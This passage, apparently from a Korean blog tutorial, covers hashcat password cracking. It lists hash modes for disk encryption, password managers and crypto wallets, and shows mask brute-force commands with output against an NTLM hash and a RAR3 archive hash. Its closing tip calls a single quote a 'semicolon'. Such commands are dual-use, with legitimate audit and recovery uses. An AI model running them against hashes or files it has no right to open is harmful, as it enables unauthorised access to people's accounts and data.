     24 | SolarWinds Serv-U                                          | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                                       | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                                       | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                                       | Enterprise Application Software (EAS)
  26200 | OpenEdge Progress Encode                                   | Enterprise Application Software (EAS)
  20600 | Oracle Transportation Management (SHA256)                  | Enterprise Application Software (EAS)
   4711 | Huawei sha1(md5($pass).$salt)                              | Enterprise Application Software (EAS)
  20711 | AuthMe sha256                                              | Enterprise Application Software (EAS)
  22400 | AES Crypt (SHA256)                                         | Full-Disk Encryption (FDE)
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)                | Full-Disk Encryption (FDE)
  14600 | LUKS v1 (legacy)                                           | Full-Disk Encryption (FDE)
  29541 | LUKS v1 RIPEMD-160 + AES                                   | Full-Disk Encryption (FDE)
  29542 | LUKS v1 RIPEMD-160 + Serpent                               | Full-Disk Encryption (FDE)
  29543 | LUKS v1 RIPEMD-160 + Twofish                               | Full-Disk Encryption (FDE)
  29511 | LUKS v1 SHA-1 + AES                                        | Full-Disk Encryption (FDE)
  29512 | LUKS v1 SHA-1 + Serpent                                    | Full-Disk Encryption (FDE)
  29513 | LUKS v1 SHA-1 + Twofish                                    | Full-Disk Encryption (FDE)
  29521 | LUKS v1 SHA-256 + AES                                      | Full-Disk Encryption (FDE)
  29522 | LUKS v1 SHA-256 + Serpent                                  | Full-Disk Encryption (FDE)
  29523 | LUKS v1 SHA-256 + Twofish                                  | Full-Disk Encryption (FDE)
  29531 | LUKS v1 SHA-512 + AES                                      | Full-Disk Encryption (FDE)
  29532 | LUKS v1 SHA-512 + Serpent                                  | Full-Disk Encryption (FDE)
  29533 | LUKS v1 SHA-512 + Twofish                                  | Full-Disk Encryption (FDE)
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit (legacy)                 | Full-Disk Encryption (FDE)
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit (legacy)                | Full-Disk Encryption (FDE)
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit (legacy)                | Full-Disk Encryption (FDE)
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode (legacy)     | Full-Disk Encryption (FDE)
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode (legacy)    | Full-Disk Encryption (FDE)
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode (legacy)    | Full-Disk Encryption (FDE)
  29411 | VeraCrypt RIPEMD160 + XTS 512 bit                          | Full-Disk Encryption (FDE)
  29412 | VeraCrypt RIPEMD160 + XTS 1024 bit                         | Full-Disk Encryption (FDE)
  29413 | VeraCrypt RIPEMD160 + XTS 1536 bit                         | Full-Disk Encryption (FDE)
  29441 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode              | Full-Disk Encryption (FDE)
  29442 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode             | Full-Disk Encryption (FDE)
  29443 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode             | Full-Disk Encryption (FDE)
  13751 | VeraCrypt SHA256 + XTS 512 bit (legacy)                    | Full-Disk Encryption (FDE)
  13752 | VeraCrypt SHA256 + XTS 1024 bit (legacy)                   | Full-Disk Encryption (FDE)
  13753 | VeraCrypt SHA256 + XTS 1536 bit (legacy)                   | Full-Disk Encryption (FDE)
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode (legacy)        | Full-Disk Encryption (FDE)
  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode (legacy)       | Full-Disk Encryption (FDE)
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode (legacy)       | Full-Disk Encryption (FDE)
  29451 | VeraCrypt SHA256 + XTS 512 bit                             | Full-Disk Encryption (FDE)
  29452 | VeraCrypt SHA256 + XTS 1024 bit                            | Full-Disk Encryption (FDE)
  29453 | VeraCrypt SHA256 + XTS 1536 bit                            | Full-Disk Encryption (FDE)
  29461 | VeraCrypt SHA256 + XTS 512 bit + boot-mode                 | Full-Disk Encryption (FDE)
  29462 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode                | Full-Disk Encryption (FDE)
  29463 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode                | Full-Disk Encryption (FDE)
  13721 | VeraCrypt SHA512 + XTS 512 bit (legacy)                    | Full-Disk Encryption (FDE)
  13722 | VeraCrypt SHA512 + XTS 1024 bit (legacy)                   | Full-Disk Encryption (FDE)
  13723 | VeraCrypt SHA512 + XTS 1536 bit (legacy)                   | Full-Disk Encryption (FDE)
  29421 | VeraCrypt SHA512 + XTS 512 bit                             | Full-Disk Encryption (FDE)
  29422 | VeraCrypt SHA512 + XTS 1024 bit                            | Full-Disk Encryption (FDE)
  29423 | VeraCrypt SHA512 + XTS 1536 bit                            | Full-Disk Encryption (FDE)
  13771 | VeraCrypt Streebog-512 + XTS 512 bit (legacy)              | Full-Disk Encryption (FDE)
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit (legacy)             | Full-Disk Encryption (FDE)
  13773 | VeraCrypt Streebog-512 + XTS 1536 bit (legacy)             | Full-Disk Encryption (FDE)
  13781 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode (legacy)  | Full-Disk Encryption (FDE)
  13782 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode (legacy) | Full-Disk Encryption (FDE)
  13783 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode (legacy) | Full-Disk Encryption (FDE)
  29471 | VeraCrypt Streebog-512 + XTS 512 bit                       | Full-Disk Encryption (FDE)
  29472 | VeraCrypt Streebog-512 + XTS 1024 bit                      | Full-Disk Encryption (FDE)
  29473 | VeraCrypt Streebog-512 + XTS 1536 bit                      | Full-Disk Encryption (FDE)
  29481 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode           | Full-Disk Encryption (FDE)
  29482 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode          | Full-Disk Encryption (FDE)
  29483 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode          | Full-Disk Encryption (FDE)
  13731 | VeraCrypt Whirlpool + XTS 512 bit (legacy)                 | Full-Disk Encryption (FDE)
  13732 | VeraCrypt Whirlpool + XTS 1024 bit (legacy)                | Full-Disk Encryption (FDE)
  13733 | VeraCrypt Whirlpool + XTS 1536 bit (legacy)                | Full-Disk Encryption (FDE)
  29431 | VeraCrypt Whirlpool + XTS 512 bit                          | Full-Disk Encryption (FDE)
  29432 | VeraCrypt Whirlpool + XTS 1024 bit                         | Full-Disk Encryption (FDE)
  29433 | VeraCrypt Whirlpool + XTS 1536 bit                         | Full-Disk Encryption (FDE)
  23900 | BestCrypt v3 Volume Encryption                             | Full-Disk Encryption (FDE)
  16700 | FileVault 2                                                | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)              | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)              | Full-Disk Encryption (FDE)
  20011 | DiskCryptor SHA512 + XTS 512 bit                           | Full-Disk Encryption (FDE)
  20012 | DiskCryptor SHA512 + XTS 1024 bit                          | Full-Disk Encryption (FDE)
  20013 | DiskCryptor SHA512 + XTS 1536 bit                          | Full-Disk Encryption (FDE)
  22100 | BitLocker                                                  | Full-Disk Encryption (FDE)
  12900 | Android FDE (Samsung DEK)                                  | Full-Disk Encryption (FDE)
   8800 | Android FDE <= 4.3                                         | Full-Disk Encryption (FDE)
  18300 | Apple File System (APFS)                                   | Full-Disk Encryption (FDE)
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit (legacy)                 | Full-Disk Encryption (FDE)
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit (legacy)                | Full-Disk Encryption (FDE)
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit (legacy)                | Full-Disk Encryption (FDE)
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode (legacy)     | Full-Disk Encryption (FDE)
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode (legacy)    | Full-Disk Encryption (FDE)
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode (legacy)    | Full-Disk Encryption (FDE)
  29311 | TrueCrypt RIPEMD160 + XTS 512 bit                          | Full-Disk Encryption (FDE)
  29312 | TrueCrypt RIPEMD160 + XTS 1024 bit                         | Full-Disk Encryption (FDE)
  29313 | TrueCrypt RIPEMD160 + XTS 1536 bit                         | Full-Disk Encryption (FDE)
  29341 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode              | Full-Disk Encryption (FDE)
  29342 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode             | Full-Disk Encryption (FDE)
  29343 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode             | Full-Disk Encryption (FDE)
   6221 | TrueCrypt SHA512 + XTS 512 bit (legacy)                    | Full-Disk Encryption (FDE)
   6222 | TrueCrypt SHA512 + XTS 1024 bit (legacy)                   | Full-Disk Encryption (FDE)
   6223 | TrueCrypt SHA512 + XTS 1536 bit (legacy)                   | Full-Disk Encryption (FDE)
  29321 | TrueCrypt SHA512 + XTS 512 bit                             | Full-Disk Encryption (FDE)
  29322 | TrueCrypt SHA512 + XTS 1024 bit                            | Full-Disk Encryption (FDE)
  29323 | TrueCrypt SHA512 + XTS 1536 bit                            | Full-Disk Encryption (FDE)
   6231 | TrueCrypt Whirlpool + XTS 512 bit (legacy)                 | Full-Disk Encryption (FDE)
   6232 | TrueCrypt Whirlpool + XTS 1024 bit (legacy)                | Full-Disk Encryption (FDE)
   6233 | TrueCrypt Whirlpool + XTS 1536 bit (legacy)                | Full-Disk Encryption (FDE)
  29331 | TrueCrypt Whirlpool + XTS 512 bit                          | Full-Disk Encryption (FDE)
  29332 | TrueCrypt Whirlpool + XTS 1024 bit                         | Full-Disk Encryption (FDE)
  29333 | TrueCrypt Whirlpool + XTS 1536 bit                         | Full-Disk Encryption (FDE)
  12200 | eCryptfs                                                   | Full-Disk Encryption (FDE)
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                              | Document
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1                 | Document
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2                 | Document
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                              | Document
  25400 | PDF 1.4 - 1.6 (Acrobat 5 - 8) - user and owner pass        | Document
  10600 | PDF 1.7 Level 3 (Acrobat 9)                                | Document
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                          | Document
   9400 | MS Office 2007                                             | Document
   9500 | MS Office 2010                                             | Document
   9600 | MS Office 2013                                             | Document
  25300 | MS Office 2016 - SheetProtection                           | Document
   9700 | MS Office <= 2003 $0/$1, MD5 + RC4                         | Document
   9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1            | Document
   9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2            | Document
   9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1              | Document
   9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2              | Document
   9800 | MS Office <= 2003 $3/$4, SHA1 + RC4                        | Document
  18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)              | Document
  18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish)           | Document
  16200 | Apple Secure Notes                                         | Document
  23300 | Apple iWork                                                | Document
   6600 | 1Password, agilekeychain                                   | Password Manager
   8200 | 1Password, cloudkeychain                                   | Password Manager
   9000 | Password Safe v2                                           | Password Manager
   5200 | Password Safe v3                                           | Password Manager
   6800 | LastPass + LastPass sniffed                                | Password Manager
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  23400 | Bitwarden                                                  | Password Manager
  16900 | Ansible Vault                                              | Password Manager
  26000 | Mozilla key3.db                                            | Password Manager
  26100 | Mozilla key4.db                                            | Password Manager
  23100 | Apple Keychain                                             | Password Manager
  11600 | 7-Zip                                                      | Archive
  12500 | RAR3-hp                                                    | Archive
  23800 | RAR3-p (Compressed)                                        | Archive
  23700 | RAR3-p (Uncompressed)                                      | Archive
  13000 | RAR5                                                       | Archive
  17220 | PKZIP (Compressed Multi-File)                              | Archive
  17200 | PKZIP (Compressed)                                         | Archive
  17225 | PKZIP (Mixed Multi-File)                                   | Archive
  17230 | PKZIP (Mixed Multi-File Checksum-Only)                     | Archive
  17210 | PKZIP (Uncompressed)                                       | Archive
  20500 | PKZIP Master Key                                           | Archive
  20510 | PKZIP Master Key (6 byte optimization)                     | Archive
  23001 | SecureZIP AES-128                                          | Archive
  23002 | SecureZIP AES-192                                          | Archive
  23003 | SecureZIP AES-256                                          | Archive
  13600 | WinZip                                                     | Archive
  18900 | Android Backup                                             | Archive
  24700 | Stuffit5                                                   | Archive
  13200 | AxCrypt 1                                                  | Archive
  13300 | AxCrypt 1 in-memory SHA1                                   | Archive
  23500 | AxCrypt 2 AES-128                                          | Archive
  23600 | AxCrypt 2 AES-256                                          | Archive
  14700 | iTunes backup < 10.0                                       | Archive
  14800 | iTunes backup >= 10.0                                      | Archive
   8400 | WBB3 (Woltlab Burning Board)                               | Forums, CMS, E-Commerce
   2612 | PHPS                                                       | Forums, CMS, E-Commerce
    121 | SMF (Simple Machines Forum) > v1.1                         | Forums, CMS, E-Commerce
   3711 | MediaWiki B type                                           | Forums, CMS, E-Commerce
   4521 | Redmine                                                    | Forums, CMS, E-Commerce
  24800 | Umbraco HMAC-SHA1                                          | Forums, CMS, E-Commerce
     11 | Joomla < 2.5.18                                            | Forums, CMS, E-Commerce
  13900 | OpenCart                                                   | Forums, CMS, E-Commerce
  11000 | PrestaShop                                                 | Forums, CMS, E-Commerce
  16000 | Tripcode                                                   | Forums, CMS, E-Commerce
   7900 | Drupal7                                                    | Forums, CMS, E-Commerce
   4522 | PunBB                                                      | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ (Invision Power Board)                    | Forums, CMS, E-Commerce
   2611 | vBulletin < v3.8.5                                         | Forums, CMS, E-Commerce
   2711 | vBulletin >= v3.8.5                                        | Forums, CMS, E-Commerce
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                                    | Forums, CMS, E-Commerce
  18100 | TOTP (HMAC-SHA1)                                           | One-Time Password
   2000 | STDOUT                                                     | Plaintext
  99999 | Plaintext                                                  | Plaintext
  21600 | Web2py pbkdf2-sha512                                       | Framework
  10000 | Django (PBKDF2-SHA256)                                     | Framework
    124 | Django (SHA-1)                                             | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                               | Framework
  19500 | Ruby on Rails Restful-Authentication                       | Framework
  27200 | Ruby on Rails Restful Auth (one round, no sitekey)         | Framework
  20200 | Python passlib pbkdf2-sha512                               | Framework
  20300 | Python passlib pbkdf2-sha256                               | Framework
  20400 | Python passlib pbkdf2-sha1                                 | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)          | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES)        | Private Key
  15500 | JKS Java Key Store Private Keys (SHA1)                     | Private Key
  22911 | RSA/DSA/EC/OpenSSH Private Keys ($0$)                      | Private Key
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)                      | Private Key
  22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)                  | Private Key
  22941 | RSA/DSA/EC/OpenSSH Private Keys ($4$)                      | Private Key
  22951 | RSA/DSA/EC/OpenSSH Private Keys ($5$)                      | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                                     | Instant Messaging Service
  28300 | Teamspeak 3 (channel hash)                                 | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)              | Instant Messaging Service
  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)           | Instant Messaging Service
  22301 | Telegram Mobile App Passcode (SHA256)                      | Instant Messaging Service
     23 | Skype                                                      | Instant Messaging Service
  26600 | MetaMask Wallet                                            | Cryptocurrency Wallet
  21000 | BitShares v0.x - sha512(sha512_bin(pass))                  | Cryptocurrency Wallet
  28501 | Bitcoin WIF private key (P2PKH), compressed                | Cryptocurrency Wallet
  28502 | Bitcoin WIF private key (P2PKH), uncompressed              | Cryptocurrency Wallet
  28503 | Bitcoin WIF private key (P2WSH, Bech32), compressed        | Cryptocurrency Wallet
  28504 | Bitcoin WIF private key (P2WSH, Bech32), uncompressed      | Cryptocurrency Wallet
  11300 | Bitcoin/Litecoin wallet.dat                                | Cryptocurrency Wallet
  16600 | Electrum Wallet (Salt-Type 1-3)                            | Cryptocurrency Wallet
  21700 | Electrum Wallet (Salt-Type 4)                              | Cryptocurrency Wallet
  21800 | Electrum Wallet (Salt-Type 5)                              | Cryptocurrency Wallet
  12700 | Blockchain, My Wallet                                      | Cryptocurrency Wallet
  15200 | Blockchain, My Wallet, V2                                  | Cryptocurrency Wallet
  18800 | Blockchain, My Wallet, Second Password (SHA256)            | Cryptocurrency Wallet
  25500 | Stargazer Stellar Wallet XLM                               | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256               | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                        | Cryptocurrency Wallet
  15700 | Ethereum Wallet, SCRYPT                                    | Cryptocurrency Wallet
  22500 | MultiBit Classic .key (MD5)                                | Cryptocurrency Wallet
  27700 | MultiBit Classic .wallet (scrypt)                          | Cryptocurrency Wallet
  22700 | MultiBit HD (scrypt)                                       | Cryptocurrency Wallet
  28200 | Exodus Desktop Wallet (scrypt)                             | Cryptocurrency Wallet

3. Device Types

crack에 사용할 자원 CPU, GPU 등 선택하여 공격을 진행할 수 있다.
ex ) - d 1, -D 2
-d : 사용할 백엔드 장치, 쉼표로 구분
-D : 사용할 OpenCL 장치

- [ Options ] -

-d, --backend-devices      | Str  | Backend devices to use, separated with commas        | -d 1
-D, --opencl-device-types  | Str  | OpenCL device-types to use, separated with commas    | -D 1

- [ OpenCL Device Types ] -

  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

두 가지 방식이 존재하는데, 현재 운영 중인 시스템의 장치 목록 조회를 위해서는
-I 옵션을 통해서 확인이 가능하다.

- [ Options ] -
-I, --backend-info             |      | Show system/evironment/backend API info              | -I or -II

MacBookPro-2 ~ % hashcat -I
hashcat (v6.2.5-532-gcd77e488d) starting in backend information mode

Metal Info:
===========

Metal.Version.: 306.7.4

Backend Device ID #1 (Alias: #2)
  Type...........: GPU
  Vendor.ID......: 2
  Vendor.........: Apple
  Name...........: Apple M1 Max
  Processor(s)...: 24
  Clock..........: N/A
  Memory.Total...: 49152 MB (limited to 18432 MB allocatable in one block)
  Memory.Free....: 24512 MB
  Local.Memory...: 32 KB
  Phys.Location..: built-in
  Feature.Set....: macOS GPU Family 2 v1
  Registry.ID....: 2416
  Max.TX.Rate....: N/A
  GPU.Properties.: headless 0, low-power 0, removable 0

OpenCL Info:
============

OpenCL Platform ID #1
  Vendor..: Apple
  Name....: Apple
  Version.: OpenCL 1.2 (Apr 15 2023 03:24:33)

  Backend Device ID #2 (Alias: #1)
    Type...........: GPU
    Vendor.ID......: 2
    Vendor.........: Apple
    Name...........: Apple M1 Max
    Version........: OpenCL 1.2 
    Processor(s)...: 24
    Clock..........: 1000
    Memory.Total...: 49152 MB (limited to 4608 MB allocatable in one block)
    Memory.Free....: 24512 MB
    Local.Memory...: 32 KB
    OpenCL.Version.: OpenCL C 1.2 
    Driver.Version.: 1.2 1.0

도무지 무슨 말인지 명확히 이해가 가지는 않음, 이게 mac이라서 문제가 있는듯한데. 아래처럼 device#2가 Device#1의 별칭이라며 건너뛰기도 하였다. 아래는 테스트한 내용이니 단순 참고.

MacBookPro-2 ~ % hashcat -d 1,2 -O -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'
hashcat (v6.2.5-532-gcd77e488d) starting
* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable. You have been warned.
The device #2 specifically listed was skipped because it is an alias of device #1
장치 #1의 별칭이므로 특별히 나열된 장치 #2를 건너뛰었습니다

METAL API (Metal 306.7.4)
=========================
* Device #1: Apple M1 Max, 24512/49152 MB, 24MCU

OpenCL API (OpenCL 1.2 (Apr 15 2023 03:24:33)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M1 Max, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash
Watchdog: Temperature abort trigger set to 100c
Host memory required for this attack: 843 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 42ef98f2e9b77304716d2aeca2f0bd96
Time.Started.....: Wed Nov 15 19:38:35 2023 (4 secs)
Time.Estimated...: Wed Nov 15 21:15:04 2023 (1 hour, 36 mins)
Kernel.Feature...: Optimized Kernel
Guess.Mask.......: ?a?a?a?a?a?a?a [7]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12060.4 MH/s (7.25ms) @ Accel:1024 Loops:128 Thr:32 Vec:1
Recovered.Total..: 0/1 (0.00%) Digests
Progress.........: 52602077184/69833729609375 (0.08%)
Rejected.........: 0/52602077184 (0.00%)
Restore.Point....: 5505024/7737809375 (0.07%)
Restore.Sub.#1...: Salt:0 Amplifier:3712-3840 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: pG@|G& -> LH(*@'
Hardware.Mon.SMC.: Fan0: 39%, Fan1: 40%
Hardware.Mon.#1..: Util:100%

Case1)
hashcat -d 1 -D 1 -O -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'
hashcat (v6.2.5-532-gcd77e488d) starting
No devices found/left.

Case2)
hashcat -d 2 -D 1 -O -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'
hashcat (v6.2.5-532-gcd77e488d) starting
No devices found/left.

Case3)
hashcat -d 1 -D 2 -O -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'
METAL API (Metal 306.7.4)
=========================
* Device #1: Apple M1 Max, 24512/49152 MB, 24MCU
OpenCL API (OpenCL 1.2 (Apr 15 2023 03:24:33)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M1 Max, skipped

Case4)
hashcat -d 2 -D 2 -O -m 1000 42EF98F2E9B77304716D2AECA2F0BD96 -a3 '?a?a?a?a?a?a?a'
hashcat (v6.2.5-532-gcd77e488d) starting
* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable. You have been warned.

METAL API (Metal 306.7.4)
=========================
* Device #1: Apple M1 Max, skipped
OpenCL API (OpenCL 1.2 (Apr 15 2023 03:24:33)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M1 Max, GPU, 24512/49152 MB (4608 MB allocatable), 24MCU

위 case로 볼 때 OpenCL은 ID가 2번이므로 -D 2에서만 정상적으로 동작하는 듯하다. -d 2에서 돌아간 이유는? alias 때문인가 ㅎㅎㅎㅎ 잘 모르겠다 몇 번 테스트해보고 성능에 맞게 쓰면 좋을듯하다.

4. Workload Profiles

hash crack에 사용할 workload Profiles를 사용한다. Profiles 종류로는 아래의 내용을 참고* 숫자가 높을수록 고성능, 많은 자원필요

- [ Options ] -
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 
 
 - [ Workload Profiles ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

5. Optimized-kernel-enable

정확히 어떤 옵션인지, 의미인지는 모르겠으나, -O 옵션이 없는 상황에서 사용했을 때 다음과 같은 알림이 발생함.
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
주의! 최적화되지 않은 순수 백엔드 커널이 선택되었습니다.
순수 커널은 더 긴 암호를 해독할 수 있지만 성능은 크게 저하됩니다.
최적화된 커널로 전환하려면 명령줄에 -O를 추가합니다.

- [ Options ] -
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |

알림대로 -O 옵션을 사용하였을 때 성능면에서 훨씬 높은 성능을 확인할 수 있었음

< -O 옵션 미사용 >

Session..........: hashcat                                
Status...........: Quit
Hash.Mode........: 12500 (RAR3-hp)
Hash.Target......: $RAR3$*0*de64fbe39c668063*6d67dc531cc348e568cdd30e623a00bc
Time.Started.....: Wed Nov 15 20:09:09 2023 (52 secs)
Time.Estimated...: Sun Nov 19 05:21:43 2023 (3 days, 9 hours)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?1?1security?1?1?1 [13]
Guess.Charset....: -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%, -2 Undefined, -3 Undefined, -4 Undefined 
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     4618 H/s (81.34ms) @ Accel:8 Loops:16384 Thr:32 Vec:1
Recovered.Total..: 0/1 (0.00%) Digests
Progress.........: 239616/1350125107 (0.02%)
Rejected.........: 0/239616 (0.00%)
Restore.Point....: 0/20151121 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:39-40 Iteration:81920-98304
Candidate.Engine.: Device Generator
Candidates.#1....: Lasecurity123 -> LSsecurityuna
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util:100%

< -O 옵션 사용 >

Session..........: hashcat
Status...........: Running
Hash.Mode........: 12500 (RAR3-hp)
Hash.Target......: $RAR3$*0*de64fbe39c668063*6d67dc531cc348e568cdd30e623a00bc
Time.Started.....: Wed Nov 15 20:10:09 2023 (52 secs)
Time.Estimated...: Fri Nov 17 08:50:18 2023 (1 day, 12 hours)
Kernel.Feature...: Optimized Kernel
Guess.Mask.......: ?1?1security?1?1?1 [13]
Guess.Charset....: -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%, -2 Undefined, -3 Undefined, -4 Undefined 
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    10228 H/s (148.73ms) @ Accel:32 Loops:16384 Thr:32 Vec:1
Recovered.Total..: 0/1 (0.00%) Digests
Progress.........: 516096/1350125107 (0.04%)
Rejected.........: 0/516096 (0.00%)
Restore.Point....: 0/20151121 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:21-22 Iteration:163840-180224
Candidate.Engine.: Device Generator
Candidates.#1....: wasecurity123 -> wPsecurityzya
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util:100%

6. 사용 예시.

example) 응용 사용 예

hashcat -m 12500 -d 1 -D 2 -a 3  -O -w 3 -a 3 '$RAR3$*0*de64fbe39c668063*6d67dc531cc348e568
cdd30e623a00bc' -1 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%' -i
--increment-min=13 --increment-max 13 '?1?1security?1?1?1'

- -m 12500 : RAR3-hp
- -1 : 사용자 마스크 : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%
- -i --increment-min=13 --increment-max 13 : 최소, 최대 13글자 고정
- ?1?1security?1?1?1 : 사용자마스크 ?1?1 + security + 사용자마스크?1?1?1

Session..........: hashcat                                
Status...........: Quit
Hash.Mode........: 12500 (RAR3-hp)
Hash.Target......: $RAR3$*0*de64fbe39c668063*6d67dc531cc348e568cdd30e623a00bc
Time.Started.....: Wed Nov 15 19:56:49 2023 (57 secs)
Time.Estimated...: Fri Nov 17 08:11:46 2023 (1 day, 12 hours)
Kernel.Feature...: Optimized Kernel
Guess.Mask.......: ?1?1security?1?1?1 [13]
Guess.Charset....: -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%, -2 Undefined, -3 Undefined, -4 Undefined 
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    10346 H/s (143.84ms) @ Accel:32 Loops:16384 Thr:32 Vec:1
Recovered.Total..: 0/1 (0.00%) Digests
Progress.........: 589824/1350125107 (0.04%)
Rejected.........: 0/589824 (0.00%)
Restore.Point....: 0/20151121 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:24-25 Iteration:49152-65536
Candidate.Engine.: Device Generator
Candidates.#1....: vasecurity123 -> vPsecurityzya
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 98%

etc. tip?

가끔 명령어가 인식이 안될 때는 옵션 뒤에 붙이는 문자열, 패턴 등에 세미콜론(')을 찍어보자.

